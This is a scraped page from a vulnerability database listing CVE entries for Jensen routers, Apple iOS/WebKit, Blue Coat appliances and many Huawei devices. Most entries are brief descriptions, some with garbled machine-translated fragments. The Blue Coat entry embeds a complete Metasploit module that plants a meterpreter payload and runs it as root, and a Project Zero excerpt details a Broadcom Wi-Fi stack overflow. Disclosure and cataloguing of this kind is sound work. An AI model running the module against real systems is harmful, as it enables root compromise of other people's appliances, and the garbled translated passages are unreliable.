VARIoT IoT vulnerabilities database

Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct Open Redirect attacks via the submit-url parameter to certain /goform/* pages. Air: Link3G, Air: Link5000AC, Air: Link59300 is the router of the Norwegian Jensenof Scandinavia company. An attacker can construct a malicious URI, entice the user to resolve, and redirect the user to any WEB site for phishing attacks. are all routers of Jensen of Scandinavia AS in Norway. Several Jensen of Scandinavia AS Air:Link products have security vulnerabilities. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev

Jensen of Scandinavia AS Air:Link 3G (AL3G) version 2.23m (Rev. 3), Air:Link 5000AC (AL5000AC) version 1.13, and Air:Link 59300 (AL59300) version 1.04 (Rev. 4) devices allow remote attackers to conduct Open Redirect attacks via the return-url parameter to /goform/formLogout. Air: Link3G, Air: Link5000AC, Air: Link59300 is the router of the Norwegian Jensenof Scandinavia company. An attacker can construct a malicious URI, entice the user to resolve, and redirect the user to any WEB site for phishing attacks. are all routers of Jensen of Scandinavia AS in Norway. Several Jensen of Scandinavia AS Air:Link products have security vulnerabilities. 3); Air: Link 5000AC (AL5000AC) prior to 1.13; Air: Link 59300 (AL59300) 1.04 (Rev

Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges. BlueCoatAdvancedSecureGateway (ASG) and ContentAnalysisSystem (CAS) are products of BlueCoatSystems, USA. ASG is a secure Web gateway device; CAS is a malware analysis system that integrates an application whitelist and a dual anti-malware signature database. Multiple Bluecoat Products are prone to command-injection vulnerability because it fails to properly sanitize user-supplied input. This may aid in further attacks. The following products are affected: Advanced Secure Gateway 6.6 prior to 6.6.5.4 is vulnerable. Content Analysis System 1.3 prior to 1.3.7.4 is vulnerable. # Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS # Date: April 3, 2017 # Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd # Contact: chrisdhebert[at]gmail.com # Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138 # Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable # Tested on: BlueCoat CAS 1.3.7.1 # CVE : cve-2016-9091 Timeline: -------- 08/31/2016 (Vulnerablities Discovered) 03/31/2017 (Final Vendor Patch Confirmed) 04/03/2017 (Public Release) Description: The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerablity. A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script. Proof of Concept: Metasploit Module - root priv escalation (via mvtroubleshooting.sh) ----------------- ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' class Metasploit4 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::EXE include Msf::Post::File include Msf::Exploit::Local::Linux def initialize(info={}) super( update_info( info, { 'Name' => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)', 'Description' => %q{ This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate privileges. In order to work, a tomcat session with access to sudo on the sudoers is needed. This module is useful for post exploitation of BlueCoat vulnerabilities, where typically web server privileges are acquired, and this user is allowed to execute sudo on the sudoers file. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Hebert <chrisdhebert[at]gmail.com>', 'Pete Paccione <petepaccione[at]gmail.com>', 'Corey Boyd <corey.k.boyd[at]gmail.com>' ], 'DisclosureDate' => 'Vendor Contacted 8-31-2016', 'References' => [ ['EDB', '##TBD##'], ['CVE', '2016-9091' ], ['URL', 'http://https://bto.bluecoat.com/security-advisory/sa138'] ], 'Platform' => %w{ linux unix }, 'Arch' => [ ARCH_X86 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86 } ] ], 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, 'DefaultTarget' => 0, } )) register_options([ OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]), ], self.class) end def check id=cmd_exec("id -un") if id!="tomcat" print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat") fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat") end clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3") if clprelease!="1.3.7.1" print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1") fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1") end return Exploit::CheckCode::Vulnerable end def exploit print_status("#{peer} - Checking for vulnerable BlueCoat session...") if check != CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1") end print_status("#{peer} - Running Exploit...") exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf" write_file(exe_file, generate_payload_exe) cmd_exec "chmod +x #{exe_file}" begin #Backup original nscd init script cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$ #Replaces /etc/init.d/nscd script with meterpreter payload cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$ #Executes meterpreter payload as root cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh" #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1) ensure #Restores original nscd init script cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$ #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it) cmd_exec "/bin/rm -f #{exe_file}" end print_status("#{peer} - The exploit module has finished") #Maybe something here to deal with timeouts?? noticied inconsistant.. Exploit failed: Rex::TimeoutError Operation timed out. end end

Wi-Fi in Apple iOS before 10.3.1 does not prevent CVE-2017-6956 stack buffer overflow exploitation via a crafted access point. NOTE: because an operating system could potentially isolate itself from CVE-2017-6956 exploitation without patching Broadcom firmware functions, there is a separate CVE ID for the operating-system behavior. Apple iOS is prone to an arbitrary code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. Versions prior to iOS 10.3.1 are vulnerable. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. Wi-Fi is one of the wireless Internet access components. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2017-04-03-1 iOS 10.3.1 iOS 10.3.1 is now available and addresses the following: Wi-Fi Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later Impact: Impact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip Description: A stack buffer overflow was addressed through improved input validation. CVE-2017-6975: Gal Beniamini of Google Project Zero Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "10.3.1". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - http://gpgtools.org iQIcBAEBCgAGBQJY4mGWAAoJEIOj74w0bLRGDXMP/2Pxq15u8s/Poib9N4oDn7Y/ 6k+8C8LEz6VmBaFaxKYBbyIGVo9FfLnIUA4Xar8CI2JOz97AifMQBGZra1pXWByL TQ44DgRRyoF4+MckoNPLKaAOy1aSGLF/3m3LEduNaVDZpgIYubzHPU1KaOFMujFw M1e4NEd18+eDgW9c5gXlGHmqtViCGQ1kTi7iySDxHlDd1MguFF9rVDjU2Yfn4juz whYHQKOpcSgkeX0tSRVgOU8UzXfDrzdsP433AqELHq2frBdjbi0B37XclP3dPjsQ MPbQwUE1kbC1agxPfl97RRRFyOyfkI2a1rp9SSFOFqpqIQxkj5gYqx08ji0ol0UF rNC6TZ103Vsyzi9NmO2DO0pv9ocFpg1D2efFkZeUU2hIfdb2B9jnQaulw/WmBzmD KQ3eImhvjTyzfB6UmJm+cdQcWYFYbJBFVeQ20lPeuekckghGLNhU21Zo/HKPnYHD wR8kz0TZUC7uQaiBbB63Blz0T+nNDrkNdTD6VnOhUX9Lpx+cfu717itijduV9L35 iPRDRw9Z8yuN2K0h5SLbHD17NIsNakDDI4VTFBu98YsFJxwHAWqoIH9rdeHbTPwp MQyuwvkQTOAse+e/R+TnfE/xVAAaX6H5P2E5KAuJtO0+mqx89bqn+wF8D2QTtPci qhkKFRDRZJjCDTZijmfA =TCYT -----END PGP SIGNATURE----- . Broadcom: Stack buffer overflow when handling 802.11r (FT) authentication response CVE-2017-6975 Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS. In order to allow fast roaming between access points in a wireless network, the Broadcom firmware supports the Fast BSS Transition feature (IEEE 802.11r-2008 FT), allowing a client to roam between APs in the same mobility domain. When a client decides to roam to a different AP in an FT network (in the same mobility domain), they first send an authentication request frame. This frame is either sent to the new AP (in over-the-air FT) or to the original AP (in over-the-DS FT). The authentication request frame includes the Fast BSS Transition Information Element (FT-IE) specifying the <a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a> key holder ID (R0KH-ID) corresponding to the roam request. In response, the AP send back an authentication response frame, also containing an FT-IE. This FT-IE contains the regular fields (Anonce, Snonce, etc.) but also includes the R0KH-ID and R1KH-ID. This is done by encoding the additional fields as TLVs immediately after the structure of the FT-IE (but still within the bounds of the IE), like so: ---------------------------------------------------------------------------- | FT-IE Tag (55) | FT-IE Length | ... FT-IE Contents ... | Additional TLVs | ---------------------------------------------------------------------------- 0 1 2 84 2 + FT-IE Length On the BCM4339 SoC with firmware version 6.37.34.40 the authentication response frame for FT roaming is handled by ROM function 0x7B6A4. This function first retrieves the FT-IE. Then, it allocates a heap buffer for it, using the size specified in the IE's length field. The FT-IE is then stored in the allocated buffer, which is subsequently used to extract the R0KH-ID and R1KH-ID fields. Here is the high-level logic for this function: void function_7B6A4(...) { //Copying in the FT-IE char* ft_ie = bcm_parse_tlvs(auth_frame, auth_frame_len, 55); unsigned short ft_ie_len = ft_ie[1] + 2; char* ft_ie_buffer = malloc(ft_ie_len); memcpy(ft_ie_buffer, ft_ie, ft_ie_len); //Extracting the embedded IEs in the FT-IE. The size of the //FT-IE's fields without the embedded IEs is 84. char* ies = ft_ie_buffer + 84; int ies_length = ft_ie_len - 84; char* r0kh_id = bcm_parse_tlvs(ies, ies_length, 1); char* r1kh_id = bcm_parse_tlvs(ies, ies_length, 3); memcpy(..., ft_ie + 20, 0x20); //Copying the Anonce ... } First, it should be noted that the function erroneously assumes the size of the FT-IE is at least 84. An attacker could include a shorter FT-IE, causing the function to copy 0x20 bytes from (ft_ie + 20), which are stored as the AP's Anonce. Second, after extracting the R0KH-ID and R1KH-ID fields, the function proceeds to calculate the PTK. To do so, the value of PMK-<a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a> must first be derived. According to IEEE 802.11r-2008 - 8.5.1.5.3, the PMK-<a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a> is derived as follows: <a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a>-Key-Data = KDF-384(XXKey, "FT-<a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a>", SSIDlength || SSID || MDID || R0KHlength || R0KH-ID || S0KH-ID) PMK-<a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a> = L(<a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a>-Key-Data, 0, 256) PMK-R0Name-Salt = L(<a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a>-Key-Data, 256, 128) (see also "wpa_derive_pmk_r0" under <a href="https://w1.fi/cgit/hostap/plain/src/common/wpa_common.c" title="" class="" rel="nofollow">https://w1.fi/cgit/hostap/plain/src/common/wpa_common.c</a>) This calculation is performed by ROM function 0x13C94, which uses the R0KH-ID that was parsed earlier from the FT-IE in the authentication response frame. The function has approximately the following logic: void function_13C94(...) { char buffer[128]; ... memcpy(buffer, "FT-<a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a>", strlen("FT-<a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a>")); buffer += strlen("FT-<a href="https://crrev.com/0" title="" class="" rel="nofollow">R0</a>"); memcpy(buffer, &ssid_length, 1); buffer += 1; memcpy(buffer, ssid, ssid_length); buffer += ssid_length; memcpy(buffer, &mdid, 2); buffer += 2; memcpy(buffer, r0kh_id, r0kh_id_len); buffer += rokh_id_len; ... } Where "r0kh_id" is the contents of the R0KH-ID field that was extracted from the FT-IE, and "r0kh_id_len" is the length of the extracted field. Since the R0KH-ID field's length is not validated, an attacker can include an extremely long field within a crafted FT-IE (specifically, the R0KH-ID's length can be at most MAX_IE_SIZE + IE_HEADER_SIZE - FT_IE_SIZE = 255 + 2 - 84 = 173). This would cause the stack-allocated buffer to be overflown, corrupting the stack with attacker-controlled data. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. Found by: laginimaineb . CVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and included in macOS Mojave 10.14.5 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team CVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative CVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech CVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative CVE-2019-8586: an anonymous researcher CVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative CVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security & Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab CVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative CVE-2019-8596: Wen Xu of SSLab at Georgia Tech CVE-2019-8597: 01 working with Trend Micro Zero Day Initiative CVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative CVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative CVE-2019-8609: Wen Xu of SSLab, Georgia Tech CVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative CVE-2019-8611: Samuel Groß of Google Project Zero CVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative CVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab CVE-2019-8622: Samuel Groß of Google Project Zero CVE-2019-8623: Samuel Groß of Google Project Zero CVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab Additional recognition Safari We would like to acknowledge Michael Ball of Gradescope by Turnitin for their assistance. Installation note: Safari 12.1.1 may be obtained from the Mac App Store

JavaScriptCore in WebKit, as distributed in Safari Technology Preview Release 22, allows remote attackers to cause a denial of service (heap-based out-of-bounds write and application crash) or possibly have unspecified other impact via crafted JavaScript code that triggers access to red-zone memory locations, related to jit/ThunkGenerators.cpp, llint/LowLevelInterpreter32_64.asm, and llint/LowLevelInterpreter64.asm. WebKit is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, resulting in denial-of-service condition. Apple Safari Technology Preview is a browser of Apple (Apple). WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. A security vulnerability exists in JavaScriptCore in WebKit released in Apple Safari Technology Preview 22 release

runtime/JSONObject.cpp in JavaScriptCore in WebKit, as distributed in Safari Technology Preview Release 18, allows remote attackers to cause a denial of service (segmentation violation and application crash) via crafted JavaScript code that triggers a "type confusion" in the JSON.stringify function. Apple Safari Technology Preview is a browser of Apple (Apple). WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. A security vulnerability exists in the runtime/JSONObject.cpp file of WebKit's JavaScriptCore in Apple Safari Technology Preview 18

Huawei LogCenter V100R001C10 could allow an authenticated attacker to add abnormal device information to the log collection module, causing denial of service. Huawei LogCenter Contains an input validation vulnerability.Service operation interruption (DoS) An attack may be carried out. Huawei LogCenter is a log management software from China Huawei. A denial of service vulnerability exists in Huawei's LogCenter V100R001C10 version. The vulnerability stems from the lack of legality checking of incoming device information data. There is a denial-of-service vulnerability in Huawei LogCenter V100R001C10

Huawei FusionAccess with software V100R005C10,V100R005C20 could allow attackers to craft and send a malformed HDP protocol packet to cause the virtual cloud desktop to be displaying an error and not usable. Huawei FusionAccess Software contains input validation vulnerabilities.Service operation interruption (DoS) An attack may be carried out. Huawei FusionAccess is a desktop management system for Huawei's FusionCloud desktop cloud solution from Huawei. The system distributes, maintains, and recycles virtual desktops to users through a graphical Portal interface. An input verification vulnerability exists in Huawei FusionAccess V100R005C10 and V100R005C20

Huawei FusionManager with software V100R002C03 and V100R003C00 could allow an unauthenticated, remote attacker to conduct a CSRF attack against the user of the web interface. Huawei FusionManager is a management software for hardware devices, virtualized resources, and applications developed by Huawei in China. Cross-site request forgery vulnerabilities exist in Huawei FusionManager V100R002C03 and V100R003C00. A remote attacker could exploit this vulnerability to perform unauthorized operations

Huawei Eudemon8000E firewall with software V200R001C01SPC800 and earlier versions allows users to log in to the device using Telnet or SSH. When an attacker sends to the device a mass of TCP packets with special structure, the logging process becomes slow and users may be unable to log in to the device. Huawei Eudemon8000E The firmware contains a resource management vulnerability.Service operation interruption (DoS) An attack may be carried out. Huawei's Eudemon8000E is a new generation of high-performance T-class security gateways for operators from Huawei. There are security vulnerabilities in Huawei Eudemon8000EV200R001C01SPC800 and previous versions

Huawei S9300 with software before V100R006SPH013 and S2300,S3300,S5300,S6300 with software before V100R006SPH010 support Y.1731 and therefore have the Y.1731 vulnerability in processing special packets. The vulnerability causes the restart of switches. plural Huawei The product contains a data processing vulnerability.Denial of service (DoS) An attack could be made. The S9300, S2300, S3300, S5300, and S6300 are various types of switches introduced by Huawei. An attacker could exploit this vulnerability to reboot the device. The following products and versions are affected: Huawei S9300 V100R006C00SPC500 Version, V100R006C00SPC800 Version; S2300 V100R006C00SPC800 Version, V100R006C01SPC100 Version, V100R006C03 Version; S3300 V100R006C00SPC800 Version, V100R006C01SPC100 Version, V100R006C03 Version; S5300 V100R006C00SPC800 Version, V100R006C01SPC100 Version, V100R006C03 Version; S6300 V100R006C00SPC800 Version, V100R006C01SPC100 The version is V100R006C03

Huawei Quidway S9700 V200R003C00SPC500, Quidway S9300 V200R003C00SPC500, Quidway S7700 V200R003C00SPC500, Quidway S6700 V200R003C00SPC300, Quidway S6300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300 enable attackers to launch DoS attacks by crafting and sending malformed packets to these vulnerable products. (DoS) There is a possibility of being put into a state. The Quidway S9700, the Quidway S9300, the Quidway S7700, the Quidway S6700, the Quidway S6300, the Quidway S5700, and the Quidway S5300 are various types of switches. The following products and versions are affected: Huawei Quidway S9700 V200R003C00SPC500 Version; Quidway S9300 V200R003C00SPC500 Version; Quidway S7700 V200R003C00SPC500 Version; Quidway S6700 V200R003C00SPC500 Version; Quidway S6300 V200R003C00SPC500 Version; Quidway S5700 V200R003C00SPC500 Version; Quidway S5300 V200R003C00SPC500 Version

Huawei Campus S3700HI with software V200R001C00SPC300; Campus S5700 with software V200R002C00SPC100; Campus S7700 with software V200R003C00SPC300,V200R003C00SPC500; LSW S9700 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S2350 with software V200R003C00SPC300; S2750 with software V200R003C00SPC300; S5300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S5700 with software V200R001C00SPC300,V200R003C00SPC300; S6300 with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S6700 S3300HI with software V200R001C00SPC300,V200R002C00SPC100,V200R003C00SPC300; S7700 with software V200R001C00SPC300; S9300 with software V200R001C00SPC300,V200R003C00SPC300,V200R003C00SPC500; S9300E with software V200R003C00SPC300,V200R003C00SPC500 allow attackers to keep sending malformed packets to cause a denial of service (DoS) attack, aka a heap overflow. plural Huawei Campus The product software contains a buffer error vulnerability.Service operation interruption (DoS) An attack may be carried out. Huawei's Campus switch is a series of switches introduced by Huawei. An attacker can exploit this vulnerability by using malformed packets to cause the device to restart abnormally. The following products and versions are affected: Huawei Campus S3700HI V200R001C00SPC300 Version; Campus S5700 V200R002C00SPC100 Version; Campus S7700 V200R003C00SPC300 Version, V200R003C00SPC500 Version; LSW S9700 V200R001C00SPC300 Version, V200R003C00SPC300 Version, V200R003C00SPC500 Version; S2350 V200R003C00SPC300 Version; S2750 V200R003C00SPC300 Version; S5300 V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; S5700 V200R001C00SPC300 Version, V200R003C00SPC300 Version; S6300 V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; S6700 S3300HI V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; S7700 V200R001C00SPC300 Version; S9300 V200R001C00SPC300 Version, V200R003C00SPC300 Version, V200R003C00SPC500 Version; S9300E V200R003C00SPC300 Version , V200R003C00SPC500 version

Huawei Campus S7700 with software V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300; S9300 with software V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300; S9700 with software V200R001C00SPC300, V200R002C00SPC100, V200R003C00SPC300 allow unauthorized users to upgrade the bootrom or bootload software, bypass a Menu protection mechanism, conduct a Menu compromise attack, or bypass a Menu/upgrade protection mechanism. Huawei Campus S7700 , S9300 and S9700 Software contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. Huawei CampusS7700 is an enterprise-class campus switch of China Huawei. There are security vulnerabilities in Huawei's CampusS7700, S9300, and S9700 switches. The following products and versions are affected: Huawei S7700 V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; S9300 V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version; S9700 V200R001C00SPC300 Version, V200R002C00SPC100 Version, V200R003C00SPC300 Version

Huawei S9300, S9303, S9306, S9312 with software V100R002; S7700, S7703, S7706, S7712 with software V100R003, V100R006, V200R001, V200R002, V200R003, V200R005; S9300E, S9303E, S9306E, S9312E with software V200R001; S9700, S9703, S9706, S9712 with software V200R002, V200R003, V200R005; S12708, S12712 with software V200R005; 5700HI, 5300HI with software V100R006, V200R001, V200R002, V200R003, V200R005; 5710EI, 5310EI with software V200R002, V200R003, V200R005; 5710HI, 5310HI with software V200R003, V200R005; 6700EI, 6300EI with software V200R005 could cause a leak of IP addresses of devices, related to unintended interface support for VRP MPLS LSP Ping. Huawei S9300 and other Huawei S series switches are Huawei. An information disclosure vulnerability exists in several Huawei switches that use the VRP platform. The Huawei S9300 and others are all S-series switches of China's Huawei (Huawei). The following products and versions are affected: Huawei S300 V100R002 version, V100R003 version, V100R006 version, V200R001 version, V200R002 version, V200R003 version; S9303 V100R002 version, V100R003 version, V200R001 version, V200R003 version; V100R003 Version, V100R006 Version, V200R001 Version, V200R002 Version, V200R003 Version; S9312 V100R002 Version, V100R003 Version, V100R006 Version, V200R001 Version, V200R002 Version, V200R003 Version; S7700 V100R002 Version, V100R003 Version, V100R006 Version, V200R001 Version, V200R002 Version, V200R003 Version; S7703 V100R002 Version, V100R003 Version, V100R006 Version, V200R001 Version, V200R002 Version, V200R003 Version; S7706 V100R002 Version, V100R003 Version, V100R006 Version, V200R001 Version, V200R002 Version, V200R003 Version; S7712 V100R002 Version, V100R003 Version, V100R006 Version, V200R001 Version, V200R002 Version, V200R003 Version; S9300E V200R001 Version, V200R002 Version, V200R003 Version, V200R005 Version; S9303E V200R001 Version, V200R002 Version, V200R003 Version, V200R005 Version; S9306E V200R001 Version, V200R002 Version, V200R003 Version, V200R005 Version; S9312E

Apps on Huawei Ascend P6 mobile phones with software EDGE-U00 V100R001C17B508SP01 and earlier versions before V100R001C17B508SP02; EDGE-T00 V100R001C01B508SP01 and earlier versions before V100R001C01B508SP02; EDGE-C00 V100R001C92B508SP02 and earlier versions before V100R001C92B508SP03 can capture screens without the root permission. As a result, user information can be leaked by malware on Ascend P6 mobile phones. HuaweiP6 is a smartphone from China's Huawei company. The EDGE-U00, EDGE-T00 and EDGE-C00 are all versions. HuaweiP6 has a privilege escalation vulnerability. An attacker can use this vulnerability to perform a screen capture operation, causing user information to leak. There is a security flaw in the Huawei P6

Huawei USG9500 with software V200R001C01SPC800 and earlier versions, V300R001C00; USG2100 with software V300R001C00SPC900 and earlier versions; USG2200 with software V300R001C00SPC900; USG5100 with software V300R001C00SPC900 could allow an unauthenticated, remote attacker to conduct a CSRF attack against the user of the web interface. Huawei USG9500 is a firewall product of China Huawei. A cross-site request forgery vulnerability exists in several Huawei firewall USG series products. A remote attacker could exploit this vulnerability to perform unauthorized operations. Huawei USG9500 etc. The following products and versions are affected: Huawei USG9500 V200R001C01SPC800 and previous versions, V300R001C00 Version; USG2100 V300R001C00SPC900 and previous versions; USG2200 V300R001C00SPC900 and previous versions; USG5100 V300R001C00SPC900 and previous versions; USG5500 V300R001C00SPC900 and previous versions

Huawei home gateways WS318 with software V100R001C01B022 and earlier versions are affected by the PIN offline brute force cracking vulnerability of the WPS protocol because the random number generator (RNG) used in the supplier's solution is not random enough. As a result, brute force cracking the PIN code is easier. After an attacker cracks the PIN, the attacker can access the Internet via the cracked device. Huawei WS318 The firmware includes PRNG There is an insufficient entropy vulnerability in.Information may be obtained. Huawei WS318 is a wireless router product from China's Huawei company. A security vulnerability exists in Huawei's WS318V100R001C01B022 and previous versions

Huawei Tecal RH1288 V2 V100R002C00SPC107 and earlier versions, Tecal RH2265 V2 V100R002C00, Tecal RH2285 V2 V100R002C00SPC115 and earlier versions, Tecal RH2265 V2 V100R002C00, Tecal RH2285H V2 V100R002C00SPC111 and earlier versions, Tecal RH2268 V2 V100R002C00, Tecal RH2288 V2 V100R002C00SPC117 and earlier versions, Tecal RH2288H V2 V100R002C00SPC115 and earlier versions, Tecal RH2485 V2 V100R002C00SPC502 and earlier versions, Tecal RH5885 V2 V100R001C02SPC109 and earlier versions, Tecal RH5885 V3 V100R003C01SPC102 and earlier versions, Tecal RH5885H V3 V100R003C00SPC102 and earlier versions, Tecal XH310 V2 V100R001C00SPC110 and earlier versions, Tecal XH311 V2 V100R001C00SPC110 and earlier versions, Tecal XH320 V2 V100R001C00SPC110 and earlier versions, Tecal XH621 V2 V100R001C00SPC106 and earlier versions, Tecal DH310 V2 V100R001C00SPC110 and earlier versions, Tecal DH320 V2 V100R001C00SPC106 and earlier versions, Tecal DH620 V2 V100R001C00SPC106 and earlier versions, Tecal DH621 V2 V100R001C00SPC107 and earlier versions, Tecal DH628 V2 V100R001C00SPC107 and earlier versions, Tecal BH620 V2 V100R002C00SPC107 and earlier versions, Tecal BH621 V2 V100R002C00SPC106 and earlier versions, Tecal BH622 V2 V100R002C00SPC110 and earlier versions, Tecal BH640 V2 V100R002C00SPC108 and earlier versions, Tecal CH121 V100R001C00SPC180 and earlier versions, Tecal CH140 V100R001C00SPC110 and earlier versions, Tecal CH220 V100R001C00SPC180 and earlier versions, Tecal CH221 V100R001C00SPC180 and earlier versions, Tecal CH222 V100R002C00SPC180 and earlier versions, Tecal CH240 V100R001C00SPC180 and earlier versions, Tecal CH242 V100R001C00SPC180 and earlier versions, Tecal CH242 V3 V100R001C00SPC110 and earlier versions could allow users who log in to the products to view the sessions IDs of all online users on the Online Users page of the web UI. plural Huawei Tecal The product contains an information disclosure vulnerability.Information may be obtained. Huawei TecalRH1288V2 is a server of Huawei (Huawei) of China. An attacker could use this vulnerability to view the session IDs of all online users on the WebUI's OnlineUsers page. Huawei Tecal RH1288 V2 and others are all servers of the Chinese company Huawei

